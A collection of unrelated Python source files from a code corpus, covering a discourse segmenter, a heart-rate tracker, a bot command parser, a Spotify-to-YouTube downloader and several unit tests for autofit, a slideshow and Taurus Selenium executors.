tok[prop] = "_"
else:
tok[prop] = tok[prop]["deprel"]
# Add same parent features (whether a token has the same parent as its right/left neighbors)
tokens[0]["samepar_left"] = 0
tokens[-1]["samepar_right"] = 0
for i in range(1,len(tokens)-1):
prev, tok, next = tokens[i-1], tokens[i], tokens[i+1]
if prev["abs_parent"] == tok["abs_parent"]:
prev["samepar_right"] = 1
tok["samepar_left"] = 1
else:
prev["samepar_right"] = 0
tok["samepar_left"] = 0
if next["abs_parent"] == tok["abs_parent"]:
tok["samepar_right"] = 1
next["samepar_left"] = 1
else:
tok["samepar_right"] = 0
next["samepar_left"] = 0
return tokens_by_abs_id
@staticmethod
def bin_numbers(number,bin_splits=None):
if bin_splits is None:
return 1 # Single bin
else:
for i in bin_splits:
if number >= i:
return i
return bin_splits[0] # If number not greater than any split, it belongs in minimum bin
@staticmethod
def n_gram(data, tokens_by_abs_id, dummies=True):
"""
Turns unigram list of feature dicts into list of five-skipgram+parent features by adding features of adjacent tokens
:param data: input tokens as a list of dictionaries, each filled with token property key-values
:param tokens_by_abs_id: dictionary of absolute sent+word IDs to the corresponding token property dictionary
:param dummies: Boolean, whether to wrap data with dummy -2, -1 ... +1 +2 tokens for training (should be False when predicting)
:return: n_grammified token list without feature names, and list of header names
"""
n_grammed = []
# Remove unneeded features
del_props = ["descendants","lemma","docname","head"]
for tok in data:
for prop in del_props:
tok.pop(prop)
base_headers = sorted(data[0].keys())
headers = copy.deepcopy(base_headers)
# Create fake root token to represent parent of root tokens
root_type = copy.deepcopy(data[0])
root_type.update({"word":"_","deprel":"_","first":"_","last":"_","genre":"_","closest_left":"_",
"closest_right":"_","farthest_left":"_","farthest_right":"_","pos":"_","cpos":"_","morph":"_"})
# Also use this token to introduce "_" as possible feature value for OOV cases
oov_type = copy.deepcopy(root_type)
oov_type["abs_id"] = "OOV"
oov_type["abs_parent"] = "OOV"
tokens_by_abs_id["OOV"] = oov_type
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
headers += [pref + "_" + h for h in base_headers]
# During training, pseudo-wrap extra tokens to enable 5 skip grams
wrapped = []
wrapped.append(copy.deepcopy(data[-2]))
wrapped.append(copy.deepcopy(data[-1]))
if dummies:
wrapped.append(oov_type)
wrapped += data
if dummies:
wrapped.append(oov_type)
wrapped.append(copy.deepcopy(data[0]))
wrapped.append(copy.deepcopy(data[1]))
data = wrapped
for i in range(2,len(data)-2):
tok = data[i]
prev_prev = data[i-2]
prev = data[i-1]
next = data[i+1]
next_next = data[i+2]
if tok["abs_parent"] in tokens_by_abs_id:
par = tokens_by_abs_id[tok["abs_parent"]]
else:
par = root_type
if par["abs_parent"] in tokens_by_abs_id:
par_par = tokens_by_abs_id[par["abs_parent"]]
else:
par_par = root_type
prev_prev_props = [prev_prev[k] for k in sorted(prev_prev.keys())]
prev_props = [prev[k] for k in sorted(prev.keys())]
tok_props = [tok[k] for k in sorted(tok.keys())]
par_props = [par[k] for k in sorted(par.keys())]
par_par_props = [par_par[k] for k in sorted(par_par.keys())]
next_props = [next[k] for k in sorted(next.keys())]
next_next_props = [next_next[k] for k in sorted(next_next.keys())]
n_grammed.append(tok_props + prev_prev_props + prev_props + par_props + par_par_props + next_props + next_next_props)
return n_grammed, headers
@staticmethod
def multicol_fit_transform(dframe, columns):
"""
Transforms a pandas dataframe's categorical columns into pseudo-ordinal numerical columns and saves the mapping
:param dframe: pandas dataframe
:param columns: list of column names with categorical values to be pseudo-ordinalized
:return: the transformed dataframe and the saved mappings as a dictionary of encoders and labels
"""
if isinstance(columns, list):
columns = np.array(columns)
else:
columns = columns
encoder_dict = {}
# columns are provided, iterate through and get `classes_` ndarray to hold LabelEncoder().classes_
# for each column; should match the shape of specified `columns`
all_classes_ = np.ndarray(shape=columns.shape, dtype=object)
all_encoders_ = np.ndarray(shape=columns.shape, dtype=object)
all_labels_ = np.ndarray(shape=columns.shape, dtype=object)
for idx, column in enumerate(columns):
# instantiate LabelEncoder
le = LabelEncoder()
# fit and transform labels in the column
dframe.loc[:, column] = le.fit_transform(dframe.loc[:, column].values)
encoder_dict[column] = le
# append the `classes_` to our ndarray container
all_classes_[idx] = (column, np.array(le.classes_.tolist(), dtype=object))
all_encoders_[idx] = le
all_labels_[idx] = le
multicol_dict = {"encoder_dict":encoder_dict, "all_classes_":all_classes_,"all_encoders_":all_encoders_,"columns": columns}
return dframe, multicol_dict
@staticmethod
def multicol_transform(dframe, columns, all_encoders_):
"""
Transforms a pandas dataframe's categorical columns into pseudo-ordinal numerical columns based on existing mapping
:param dframe: a pandas dataframe
:param columns: list of column names to be transformed
:param all_encoders_: same length list of sklearn encoders, each mapping categorical feature values to numbers
:return: transformed numerical dataframe
"""
for idx, column in enumerate(columns):
dframe.loc[:, column] = all_encoders_[idx].transform(dframe.loc[:, column].values)
return dframe
if __name__ == "__main__":
p = ArgumentParser()
p.add_argument("-c","--corpus",default="spa.rst.sctb",help="corpus to use or 'all'")
p.add_argument("-d","--data_dir",default=os.path.normpath("../../../data"),help="Path to shared task data folder")
p.add_argument("-s","--sample_size",type=int,default=5000,help="Sample size to use for feature selection")
p.add_argument("-t","--tune_mode",default=None,choices=[None,"paramwise","full","hyperopt","features","permutation"])
p.add_argument("-r","--rare_thresh",type=int,default=200,help="Threshold rank for replacing words with POS tags")
p.add_argument("-m","--multitrain",action="store_true",help="Perform multitraining and save predictions for ensemble training")
p.add_argument("-b","--best_params",action="store_true",help="Load best parameters from file")
p.add_argument("--mode",action="store",default="test",choices=["train","train-test","optimize-train-test","test"])
p.add_argument("--eval_test",action="store_true",help="Evaluate on test, not dev")
p.add_argument("--auto",action="store_true",help="Evaluate on automatic parse")
opts = p.parse_args()
data_dir = opts.data_dir
rare_thresh = opts.rare_thresh
tune_mode = opts.tune_mode
if opts.auto:
data_dir = data_dir + "_parsed"
sys.stderr.write("o Evaluating on automatically parsed data\n")
corpora = os.listdir(data_dir)
if opts.corpus == "all":
corpora = [c for c in corpora if os.path.isdir(os.path.join(data_dir, c))]
else:
corpora = [c for c in corpora if os.path.isdir(os.path.join(data_dir, c)) and c == opts.corpus]
for corpus in corpora:
if "pdtb" in corpus:
continue
sys.stderr.write("o Corpus: " + corpus + "\n")
train = os.path.join(data_dir,corpus, corpus + "_train.conll")
dev = os.path.join(data_dir, corpus, corpus + "_dev.conll")
test = os.path.join(data_dir, corpus, corpus + "_test.conll")
if "." in corpus:
lang = corpus.split(".")[0]
else:
lang = "eng"
auto = "" if not opts.auto else "_auto"
seg = SubtreeSegmenter(lang=lang,model=corpus,auto=auto)
seg.corpus_dir = data_dir + os.sep + corpus
# Special genre patterns and feature settings
if "gum" in corpus:
seg.genre_pat = "GUM_(.+)_.*"
best_params = None
if "optimize" in opts.mode:
best_clf, vars, best_params = seg.optimize(train,size=opts.sample_size,tune_mode=tune_mode,rare_thresh=rare_thresh,as_text=False, cached_params=opts.best_params)
# Now train on whole training set with those variables
if "best_score" in best_params:
best_params.pop("best_score")
sys.stderr.write("\no Training best configuration\n")
seg.train(train,chosen_feats=vars,rare_thresh=rare_thresh,clf_params=best_params,as_text=False,chosen_clf=best_clf)
elif "train" in opts.mode:
feats = None
params = None
best_clf = None
if opts.best_params:
best_clf, params, feats = get_best_params(corpus, "SubtreeSegmenter" + auto)
if len(feats) == 0:
feats = None
seg.train(train,rare_thresh=rare_thresh,as_text=False,multitrain=opts.multitrain,chosen_feats=feats,clf_params=params,chosen_clf=best_clf)
if "test" in opts.mode:
if opts.multitrain:
# Get prediction performance on out-of-fold
preds = seg.predict_cached()
else:
# Get prediction performance on dev
if opts.eval_test:
conf_mat, prec, rec, f1 = seg.predict(test,eval_gold=True,as_text=False)
else:
conf_mat, prec, rec, f1 = seg.predict(dev,eval_gold=True,as_text=False)
if best_params is not None and "optimize" in opts.mode: # For optimization check if this is a new best score
prev_best_score = get_best_score(corpus,"SubtreeSegmenter" + auto)
if f1 > prev_best_score:
sys.stderr.write("o New best F1: " + str(f1) + "\n")
print(seg.clf.__dict__)
with io.open(script_dir + os.sep + "params" + os.sep + "SubtreeSegmenter"+auto+"_best_params.tab",'a',encoding="utf8") as bp:
for k, v in best_params.items():
bp.write("\t".join([corpus, best_clf.__class__.__name__, k, str(v)])+"\n")
bp.write("\t".join([corpus, best_clf.__class__.__name__, "features", ",".join(vars)])+"\n")
bp.write("\t".join([corpus, best_clf.__class__.__name__, "best_score", str(f1)])+"\n\n")
|
the-stack_0_1651 | #!/usr/bin/env python
from mapHrEstimator import *
#
# Global function
#
class Tracker:
def __init__(self, start, alpha=.01, beta=0, deltaFreqState = np.float(0), time=-1000,
maxChange = .5, boundHi=205, boundLo=40, maxDeltaT=3000):
self.freqState = np.float(start)
self.deltaFreqState = deltaFreqState
self.time = time
self.boundHi = boundHi
self.boundLo = boundLo
self.peakHist = []
self.freq = []
self.deltaFreq = []
self.timeHist = []
self.drHist = []
self.alpha = alpha
self.beta = beta
self.maxChange = maxChange
self.maxDeltaT = maxDeltaT
def update(self, time, peak, dynamicRange=None, maxRes=20):
deltaT = (time - self.time)
if deltaT > self.maxDeltaT:
deltaT = self.maxDeltaT
#Convert into seconds
deltaT = deltaT/1000
#todo - why do we need this???
if deltaT <= 0.0:
print("Negative DeltaT")
return 0
self.time = time
self.timeHist.append(self.time)
self.drHist.append(dynamicRange)
if peak == -1:
self.setInvalidHR(invalidHRHold=invalidHRHold)
return 0
if peak is None:
print("No Peak Passed to tracker")
self.peakHist.append(0)
else:
self.peakHist.append(peak)
if peak is not None:
if peak < self.boundLo or peak > self.boundHi:
peak = self.freqState
self.deltaFreqState = 0
else:
self.deltaFreqState = 0
if self.deltaFreqState > .5:
self.deltaFreqState = .5
if self.deltaFreqState < -.5:
self.deltaFreqState = -.5
# Kludge: Setting deltaFreqState to zero thus eliminated the beta part of the filter
self.deltaFreqState = 0
self.freqState += deltaT*self.deltaFreqState
if peak is not None:
residual = peak - self.freqState
alpha = self.alpha
beta = self.beta
if np.abs(residual) > maxRes:
residual = np.sign(residual)*maxRes
#update the state
self.freqState += alpha*residual
self.deltaFreqState += (beta/deltaT)*residual
if self.freqState < self.boundLo:
self.freqState = self.boundLo
self.deltaFreqState = 0
elif self.freqState > self.boundHi:
self.freqState = self.boundHi
self.deltaFreqState = 0
self.freq.append(self.freqState)
self.deltaFreq.append(self.deltaFreqState)
return 0
def setInvalidHR(self, invalidHRHold=False):
self.deltaFreqState = 0
self.peakHist.append(0)
if invalidHRHold:
self.freq.append(self.freqState) # hold prevHR during HR is invalid
else:
self.freq.append(-1) # do not hold prevHR, output -1
self.deltaFreq.append(self.deltaFreqState)
return 0
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('fname', help='data log file', default=None)
parser.add_argument('--truthFile', help='heart strap data', default=None)
parser.add_argument('--alphaFile', help='heart strap data from mio alpha', default=None)
parser.add_argument('--noPlots',help='show the plots or not',default=False,action='store_true')
parser.add_argument('--out', help='output filename', default='foo.csv')
args = parser.parse_args()
optTracks = []
accTracks = []
#header_def = [ ('time',float),('opt0',float),('opt1',float),('opt2',float),('acc0',float),('acc1',float),('acc2',float) ]
d = np.genfromtxt(args.fname,delimiter=',')
peaks = d[:,1:4]
accPeaks = d[:,4:7]
time = d[:,0]
startVals = [70]
for ind in np.arange(0,len(startVals)):
optTracks.append(Tracker(startVals[ind],maxChange=5))
startVals = [100]
for ind in np.arange(0,len(startVals)):
accTracks.append(Tracker(startVals[ind],alpha=.1,beta=.25))
for ind in np.arange(0,peaks.shape[0]):
for peakInd in np.arange(0,peaks.shape[1]):
for accInd in np.arange(0,accPeaks.shape[1]):
if (np.abs(peaks[ind,0] - peaks[ind,1]) < 20):
if np.abs(peaks[ind,peakInd]-accPeaks[ind,accInd]) < 5.0:
peaks[ind,peakInd] = np.min(peaks[ind,:])
#update the accelerometer tracks
#for each track find the closest peak
for track in np.arange(0,len(accTracks)):
accTracks[track].update(time[ind],accPeaks[ind,track])
'''
#for each track find the closest peak
for track in accTracks:
res = np.zeros((accPeaks.shape[1],))
for peakInd in np.arange(0,accPeaks.shape[1]):
res[peakInd] = np.abs(accPeaks[ind,peakInd] - track.freqState)
closest = np.argmin(res)
track.update(time[ind],accPeaks[ind,closest])
'''
#for each track find the closest peak
for track in optTracks:
res = np.zeros((peaks.shape[1],))
weight=np.array([1.0,1.0,1.0])
for peakInd in np.arange(0,peaks.shape[1]):
if peaks[ind,peakInd] > 90:
res[peakInd] = weight[peakInd]*np.abs(peaks[ind,peakInd] - track.freqState)
closest = np.argmin(res)
track.update(time[ind],peaks[ind,closest])
pl.figure()
for ind in np.arange(0,peaks.shape[1]):
pl.plot(time[:],peaks[:,ind],'+')
pl.grid(True)
#pl.figure()
#todo - interpolate truth heart rate onto measured heart rate
if args.truthFile is not None:
hrTruth = np.genfromtxt(args.truthFile,skiprows=3,delimiter=',');
tTrue=hrTruth[:,0]-hrTruth[1,0]
tTrue /= 1000
pl.plot(tTrue,hrTruth[:,1],'g')
for track in optTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
for ind in np.arange(0,accPeaks.shape[1]):
pl.plot(time[:],accPeaks[:,ind],'+')
for track in accTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
if args.truthFile is not None:
pl.plot(tTrue,hrTruth[:,1],'g')
for track in optTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
pl.plot(optTracks[0].residual)
pl.show()
|
the-stack_0_1654 | from __future__ import annotations
import inspect
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union
from .command import Command
from .converters import _CONVERTERS
if TYPE_CHECKING:
from .context import Context
__all__ = ("StringParser",)
class StringParser:
"""
A class representing a StringParser.
Attributes:
command_name (Optional[str]): The name of the command.
command (Optional[Command]): The [Command](./command.md) object.
arguments (List[str]): The arguments of the command.
content (str): The content of the command.
prefix (Union[Tuple[str], str]): The prefix of the command.
"""
def __init__(self, content: str, prefix: Union[str, Tuple[str, ...], List[str]]) -> None:
"""
Initialize a StringParser.
Parameters:
content (str): The content of the command.
prefix (Union[Tuple[str], str]): The prefix of the command.
"""
self.command_name: Optional[str] = None
self.command: Optional[Command] = None
self.arguments: List[str] = []
self.content = content
self.prefix = prefix
self.context: Context
def find_command(self) -> Optional[str]:
"""
Find the command.
Returns:
The command name.
"""
tokens = self.content.split(" ")
if prefix := self.parse_prefix():
if tokens[0].startswith(prefix):
self.command_name = tokens[0][len(prefix) :]
self.arguments = tokens[1:]
return self.command_name
return None
def parse_prefix(self) -> Optional[str]:
"""
Parse the prefix.
Returns:
The prefix.
"""
if isinstance(self.prefix, (tuple, list)):
find_prefix = [self.content.startswith(prefix) for prefix in self.prefix]
for index, prefix in enumerate(find_prefix):
if prefix is not True:
continue
return self.prefix[index]
elif not isinstance(self.prefix, (tuple, list)):
return self.prefix
return None
async def parse_arguments(self) -> Tuple[Dict, List]:
"""
Parse the arguments.
Returns:
The arguments and the keyword-arguments.
"""
keyword_arguments: Dict = {}
arguments: List = []
if self.command is not None:
signature = inspect.signature(self.command.callback)
for index, (argument, parameter) in enumerate(signature.parameters.items()):
if index == 0:
continue
if index == 1 and self.command.parent is not None:
continue
if parameter.kind is parameter.POSITIONAL_OR_KEYWORD:
arguments.append(await self.convert(parameter, self.arguments[index - 1]))
elif parameter.kind is parameter.KEYWORD_ONLY:
keyword_arguments[argument] = await self.convert(parameter, " ".join(self.arguments[index - 1 :]))
return keyword_arguments, arguments
async def convert(self, parameter: inspect.Parameter, data: str) -> Any:
name = parameter.annotation.removeprefix("lefi.")
if converter := _CONVERTERS.get(name):
return await converter.convert(self.context, data)
if parameter.annotation is not parameter.empty and callable(parameter.annotation):
return parameter.annotation(data)
return str(data)
@property
def invoker(self) -> Optional[Command]:
"""
Get the invoker.
Returns:
The invoker [Command](./command.md).
"""
return self.command
@property
def invoked_with(self) -> Optional[str]:
"""
The prefix the command was invoked with.
Returns:
The prefix.
"""
return self.parse_prefix()
|
the-stack_0_1659 | import os
import pickle
from pathlib import Path
import pytest
import autofit as af
from autoconf.conf import output_path_for_test
from autofit.non_linear.paths.null import NullPaths
def test_null_paths():
search = af.DynestyStatic()
assert isinstance(
search.paths,
NullPaths
)
class TestPathDecorator:
@staticmethod
def assert_paths_as_expected(paths):
assert paths.name == "name"
assert paths.path_prefix == ""
def test_with_arguments(self):
search = af.MockSearch()
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
def test_positional(self):
search = af.MockSearch("name")
paths = search.paths
assert paths.name == "name"
def test_paths_argument(self):
search = af.MockSearch()
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
def test_combination_argument(self):
search = af.MockSearch("other", )
search.paths = af.DirectoryPaths(name="name")
self.assert_paths_as_expected(search.paths)
output_path = Path(
__file__
).parent / "path"
@pytest.fixture(
name="model"
)
def make_model():
return af.Model(
af.Gaussian
)
@output_path_for_test(
output_path
)
def test_identifier_file(model):
paths = af.DirectoryPaths()
paths.model = model
paths.search = af.DynestyStatic()
paths.save_all({}, {}, [])
assert os.path.exists(
output_path / paths.identifier / ".identifier"
)
def test_serialize(model):
paths = af.DirectoryPaths()
paths.model = model
pickled_paths = pickle.loads(
pickle.dumps(
paths
)
)
assert pickled_paths.model is not None
|
the-stack_0_1660 | import game
import pygame
from config import Config
class Main:
def __init__(self):
self.game_clock = pygame.time.Clock()
self.game = game.Game()
def mainloop(self):
while Config.BOOLEAN['game_loop']:
self.game.change_screen()
self.game_clock.tick(Config.CONSTANT['CLOCK'])
main = Main()
if __name__ == '__main__':
main.mainloop()
|
the-stack_0_1662 | from __future__ import unicode_literals
import re
import os
import spotipy.util as util
import youtube_dl
from spotify_dl.scaffold import *
def authenticate():
"""Authenticates you to Spotify
"""
scope = 'user-library-read'
username = ''
return util.prompt_for_user_token(username, scope)
def fetch_tracks(sp, playlist, user_id):
"""Fetches tracks from Spotify user's saved
tracks or from playlist(if playlist parameter is passed
and saves song name and artist name to songs list
"""
log.debug('Fetching saved tracks')
offset = 0
songs_dict = {}
if user_id is None:
current_user_id = sp.current_user()['id']
else:
current_user_id = user_id
while True:
if playlist is None:
results = sp.current_user_saved_tracks(limit=50, offset=offset)
else:
results = sp.user_playlist_tracks(current_user_id, playlist, None,
limit=50, offset=offset)
log.debug('Got result json %s', results)
for item in results['items']:
track = item['track']
if track is not None:
track_name = str(track['name'])
track_artist = str(track['artists'][0]['name'])
log.debug('Appending %s to'
'songs list', (track['name'] + ' - ' + track['artists'][0]['name']))
songs_dict.update({track_name: track_artist})
else:
log.warning("Track/artist name for %s not found, skipping", track)
offset += 1
if results.get('next') is None:
log.info('All pages fetched, time to leave.'
' Added %s songs in total', offset)
break
return songs_dict
def save_songs_to_file(songs, directory):
"""
:param songs
Saves the songs fetched from fetch_tracks function to songs.txt file
to be downloaded from youtube-dl
"""
with open(os.path.join(directory, 'songs.txt'), 'w', encoding="utf-8") as f:
f.write(' '.join(str(songs)))
f.close()
def download_songs(info, download_directory, format_string, skip_mp3):
"""
Downloads songs from the YouTube URL passed to either
current directory or download_directory, is it is passed
"""
for item in info:
log.debug('Songs to download: %s', item)
url_, track_, artist_ = item
download_archive = download_directory + 'downloaded_songs.txt'
outtmpl = download_directory + '%(title)s.%(ext)s'
ydl_opts = {
'format': format_string,
'download_archive': download_archive,
'outtmpl': outtmpl,
'noplaylist': True,
'postprocessor_args': ['-metadata', 'title=' + str(track_),
'-metadata', 'artist=' + str(artist_)],
}
if not skip_mp3:
mp3_postprocess_opts = {
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192',
}
ydl_opts['postprocessors'] = [mp3_postprocess_opts.copy()]
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
try:
log.debug(ydl.download([url_]))
except Exception as e:
log.debug(e)
print('Failed to download: {}'.format(url_))
continue
def extract_user_and_playlist_from_uri(uri, sp):
playlist_re = re.compile("(spotify)(:user:[\w,.]+)?(:playlist:[\w]+)")
user_id = sp.current_user()['id']
for playlist_uri in ["".join(x) for x in playlist_re.findall(uri)]:
segments = playlist_uri.split(":")
if len(segments) >= 4:
user_id = segments[2]
playlist_id = segments[4]
log.info('List ID: ' + str(playlist_id))
else:
playlist_id = segments[2]
log.info('List ID: ' + str(playlist_id))
log.info('List owner: ' + str(user_id))
return user_id, playlist_id
def playlist_name(uri, sp):
user_id, playlist_id = extract_user_and_playlist_from_uri(uri, sp)
return get_playlist_name_from_id(playlist_id, user_id, sp)
def get_playlist_name_from_id(playlist_id, user_id, sp):
playlist = sp.user_playlist(user_id, playlist_id,
fields="tracks, next, name")
name = playlist['name']
return name
|
the-stack_0_1663 | from slideshow import SlideShow
def test_init_title(mocker):
"""Test init function sets title value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("ZlNLpWJUv52wgu2Y", stub)
slideshow.root.title.assert_called_once_with("ZlNLpWJUv52wgu2Y")
def test_init_callback(mocker):
"""Test init function sets callback"""
stub = mocker.stub()
slideshow = SlideShow("", stub)
assert slideshow.start_callback == stub
def test_init_geometry(mocker):
"""Test init function sets geometry values"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub, 500, 600)
slideshow.root.geometry.assert_called_once_with("500x600+0+0")
def test_show(mocker):
"""Test show function calls Tk.mainloop()"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
slideshow.show()
slideshow.root.mainloop.assert_called_once_with()
def test_toggle_start_active(mocker):
"""Test toggle_start sets active value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
assert slideshow.is_active() is False
slideshow.toggle_start()
assert slideshow.is_active() is True
def test_toggle_start_callback(mocker):
"""Test toggle_start calls the callback function"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
slideshow = SlideShow("", stub)
slideshow.toggle_start()
stub.assert_called_once_with()
def test_toggle_start_buttontext(mocker):
"""Test toggle_start changes the button text"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
mocker.patch("tkinter.Button")
slideshow = SlideShow("", stub)
slideshow.toggle_start()
slideshow.startstop_button.config.assert_called_once_with(text="Stop")
slideshow.toggle_start()
slideshow.startstop_button.config.assert_called_with(text="Start")
def test_update_progress(mocker):
"""Test update_progress sets expected value"""
stub = mocker.stub()
mocker.patch("tkinter.Tk")
mocker.patch("tkinter.Label")
slideshow = SlideShow("", stub)
slideshow.update_progress(500, 600, "gx8oN6ZDHc3lv3xy")
slideshow.progress_label.config.assert_called_once_with(text="500 (83.33%): gx8oN6ZDHc3lv3xy")
|
the-stack_0_1664 | import os
import re
import shutil
import yaml
from io import BytesIO
import bzt
from bzt import ToolError, TaurusConfigError
from bzt.engine import EXEC
from bzt.modules._apiritif import ApiritifNoseExecutor
from bzt.modules.functional import LoadSamplesReader, FuncSamplesReader
from bzt.modules.provisioning import Local
from bzt.modules._selenium import SeleniumExecutor
from bzt.utils import LDJSONReader, FileReader
from tests.unit import BZTestCase, RESOURCES_DIR, ROOT_LOGGER, EngineEmul
from tests.unit.mocks import DummyListener
from tests.unit.modules._selenium import SeleniumTestCase, MockPythonTool
class LDJSONReaderEmul(object):
def __init__(self):
self.data = []
def read(self, last_pass=False):
for line in self.data:
yield line
class TestSeleniumExecutor(SeleniumTestCase):
# todo: get_error_diagnostics: only geckodriver, not chrome-?
def setUp(self):
super(TestSeleniumExecutor, self).setUp()
self.CMD_LINE = ''
def start_subprocess(self, args, **kwargs):
self.CMD_LINE = " ".join(args)
def obj_prepare(self):
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
def test_data_source_in_action(self):
self.configure({
EXEC: {
"executor": "selenium",
"iterations": 1,
"scenario": {
"data-sources": [RESOURCES_DIR + "selenium/data-sources/data.csv"],
"requests": [{
"label": "exec_it",
"assert": ["Simple Travel Agency"],
"actions": ["go(${host}/${page})"]}]}}})
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
def test_user_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 100,
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 100", self.CMD_LINE)
def test_load_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = False
self.obj.engine.start_subprocess = self.start_subprocess
self.obj_prepare()
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 1", self.CMD_LINE)
def test_load_no_iter_duration(self):
self.configure({
EXEC: {
"executor": "apiritif",
"hold-for": "2s",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = False
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn("--iterations", self.CMD_LINE)
def test_func_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertIn("--iterations 1", self.CMD_LINE)
def test_func_0_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 0,
"scenario": {
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
def test_func_ds_0_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"iterations": 0,
"scenario": {
"data-sources": ['one.csv'],
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
def test_func_ds_no_iter(self):
self.configure({
EXEC: {
"executor": "apiritif",
"scenario": {
"data-sources": ['one.csv'],
"requests": [
"http://blazedemo.com"]}}})
self.obj.engine.aggregator.is_functional = True
self.obj_prepare()
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
self.obj.post_process()
self.assertNotIn('--iterations', self.CMD_LINE)
class TestSeleniumStuff(SeleniumTestCase):
def start_subprocess(self, args, **kwargs):
self.CMD_LINE = args
def obj_prepare(self):
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
def obj_prepare_runner(self):
super(SeleniumExecutor, self.obj).prepare()
self.obj.install_required_tools()
for driver in self.obj.webdrivers:
self.obj.env.add_path({"PATH": driver.get_dir()})
self.obj.create_runner()
self.obj.runner._check_tools = lambda *args: None
self.obj.runner._compile_scripts = lambda: None
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.runner.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
self.obj.script = self.obj.runner.script
def test_empty_scenario(self):
"""
Raise runtime error when no scenario provided
:return:
"""
self.configure({EXEC: {"executor": "selenium"}})
self.assertRaises(TaurusConfigError, self.obj_prepare)
def test_various_raise(self):
self.configure({ # RuntimeError when
EXEC: [{ # compilation fails
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/invalid.java"}
}, { # no files of known types were found.
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/not_found"}
}]})
self.assertRaises(ToolError, self.obj_prepare)
def test_empty_test_methods(self):
self.configure({ # Test exact number of tests when
EXEC: [{ # java annotations used
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/SeleniumTest.java"}
}, { # test class extends JUnit TestCase
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/SimpleTest.java"}
}, { # annotations used and no "test" in class name
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/selenium1.java"}
}]})
self.obj_prepare_runner()
def test_from_extension(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_from_extension.yml").read()))
self.obj_prepare()
self.obj.get_widget()
self.obj.engine.start_subprocess = lambda **kwargs: None
self.obj.startup()
self.obj.post_process()
def test_requests(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_executor_requests.yml").read()))
self.obj_prepare()
self.obj.get_widget()
self.obj.engine.start_subprocess = lambda **kwargs: None
self.obj.startup()
self.obj.post_process()
def test_fail_on_zero_results(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_executor_requests.yml").read()))
self.obj_prepare()
self.obj.engine.prepared = [self.obj]
self.obj.engine.started = [self.obj]
prov = Local()
prov.engine = self.obj.engine
prov.executors = [self.obj]
prov.started_modules = [self.obj]
self.obj.engine.provisioning = prov
self.assertRaises(ToolError, self.obj.engine.provisioning.post_process)
def test_aremote_prov_requests(self):
self.obj.execution.merge({
"scenario": {
"requests": [
"http://blazedemo.com"]}})
resources = self.obj.resource_files()
self.assertEqual(0, len(resources))
def test_dont_copy_local_script_to_artifacts(self):
